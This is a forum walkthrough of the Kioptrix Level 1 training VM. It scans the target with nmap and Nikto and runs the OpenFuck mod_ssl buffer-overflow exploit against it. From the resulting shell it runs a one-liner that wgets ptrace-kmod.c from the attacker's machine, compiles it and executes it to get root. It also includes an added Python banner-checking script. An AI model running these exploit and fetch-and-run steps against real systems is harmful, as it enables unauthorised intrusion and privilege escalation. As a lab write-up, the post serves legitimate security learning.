Kioptrix Level 1 Walkthrough: SSL Exploit

by Aiden_ - 03-10-2016 at 11:42 AM
Kioptrix Level 1 mod_ssl Exploit - Continuing the previous post, which covered exploiting Kioptrix through its Samba service (Kioptrix Level 1 Walkthrough: Samba Exploit), this post covers how to exploit Kioptrix Level 1 through its SSL service, which has a buffer overflow bug.

Tools Needed
  1. Nmap
  2. Metasploit
  3. Nikto
  4. Kioptrix Level 1 : Download here
Finding the Target IP
To find the target IP, I use nmap with the -sn parameter to perform a ping scan so that live hosts can be discovered.
root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:06 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00042s latency).
MAC Address: 00:0C:29:83:B2:94 (VMware)
Nmap scan report for 192.168.33.254
Host is up (0.000044s latency).
MAC Address: 00:50:56:E2:65:F0 (VMware)
Nmap scan report for 192.168.33.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds
Scanning Services on the Server
To find the services installed on the Kioptrix server, we use nmap with the -sV parameter to perform service version scanning.
root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:38 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00022s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:83:B2:94 (VMware)
Scanning Web Server For Vulnerabilities
Nikto is a tool used to scan a web server so that the vulnerabilities on that server can be identified.
root@ubuntu-linux:/home/aiden# nikto -h 192.168.33.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.33.128
+ Target Hostname:    192.168.33.128
+ Target Port:        80
+ Start Time:         2016-03-01 01:51:01 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 111246 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
........
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi...-2002-0082, OSVDB-756.

+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. ......
So the output shows that mod_ssl can be exploited remotely, giving us a remote shell.
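As an added example (not part of the original post), here is a small Python check that parses the nmap -sV banner lines above and flags the same version-based findings that Nikto reported. The thresholds are the ones quoted in the Nikto output (mod_ssl 2.8.7 and lower, Apache 1.3 below 1.3.27 and 1.3.29); the input is constructed from the scan shown above, and the mod_ssl finding is only raised on ports where SSL is actually served.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample input: the two Apache lines from the nmap -sV scan above.
NMAP_LINES = """\
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
"""

# (component, first fixed version, identifier, needs an SSL-serving port)
# Thresholds taken from the Nikto findings quoted above; anything older is flagged.
THRESHOLDS = [
    ("Apache", (1, 3, 27), "CAN-2002-0839", False),
    ("Apache", (1, 3, 29), "CAN-2003-0542", False),
    ("mod_ssl", (2, 8, 8), "CVE-2002-0082", True),   # mod_ssl 2.8.7 and lower
]

# Matches "<port>/tcp  open  <service>  <version banner>" lines of nmap -sV output.
BANNER_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s+(.*)$")


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '1.3.20' into (1, 3, 20) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in text.split("."))


def extract_components(banner: str) -> Dict[str, Tuple[int, ...]]:
    """Pull the Apache httpd and mod_ssl versions out of a banner string."""
    comps: Dict[str, Tuple[int, ...]] = {}
    m = re.search(r"Apache httpd (\d+\.\d+\.\d+)", banner)
    if m:
        comps["Apache"] = parse_version(m.group(1))
    m = re.search(r"mod_ssl/(\d+\.\d+\.\d+)", banner)
    if m:
        comps["mod_ssl"] = parse_version(m.group(1))
    return comps


def find_findings(nmap_output: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, service, component, identifier) for every threshold a banner falls below."""
    findings = []
    for line in nmap_output.splitlines():
        m = BANNER_RE.match(line)
        if not m:
            continue
        port, service, banner = int(m.group(1)), m.group(2), m.group(3)
        comps = extract_components(banner)
        for comp, fixed, ident, needs_ssl in THRESHOLDS:
            if needs_ssl and "ssl" not in service:
                continue  # the mod_ssl overflow is reached through the TLS handshake
            if comp in comps and comps[comp] < fixed:
                findings.append((port, service, comp, ident))
    return findings
```

A banner-based check like this is a triage signal, not proof of exploitability; the Nikto output above already shows how noisy version matching can be.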

The exploit I use is OpenFuckV2, which can be found on Exploit-DB.
[+] Note that the OpenFuck exploit itself is old, so its source needs a few small additions; to see those additions, visit the following link: paulsec.github.io

[+] Step 2 of the OpenFuck fix uses the link dl.packetstormsecurity.net to download the ptrace-kmod.c exploit. Since I know the Kioptrix server in my lab is not connected to the internet, I moved ptrace-kmod.c to localhost (mv ptrace-kmod.c /var/www/html), because on a local network the hosts do not need an internet connection to talk to each other, so it ends up looking like the picture below.
[Image: Selection_007.png]
After that I compiled OpenFuck, having followed the steps at paulsec.github.io except for step no. 2.

Exploiting Kioptrix SSL

Once the exploit is compiled, it's time to run it.
root@ubuntu-linux:/home/aiden/evil# ./OpenFuck | grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)
There are two target addresses (the RedHat Linux 7.2 entries) we can use for the exploit, so we try each of them in turn. But how do I know the OS is RedHat and the Apache version is 1.3.20? Check the nmap scan results again :D

Target Address 0x6a = FAILED!
root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6a 192.168.33.128 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x81130e0
Ready to send shellcode
Spawning shell...
Good Bye!
Target Address 0x6b = SUCCESS!
root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6b 192.168.33.128 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
wget http://192.168.33.1/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--13:45:33--  http://192.168.33.1/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 192.168.33.1:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

13:45:33 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 1340
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

[+] Initially target address 0x6b failed just like 0x6a, but after running it repeatedly, up to 8 times, I finally got the remote shell shown above; I think that is because I had not fixed the bug on that Kioptrix box.

The goal of the Kioptrix server is to obtain a root shell, so this walkthrough ends here.

Final words...

Hopefully this walkthrough is useful for all of us, and I apologise if any of the definitions are wrong.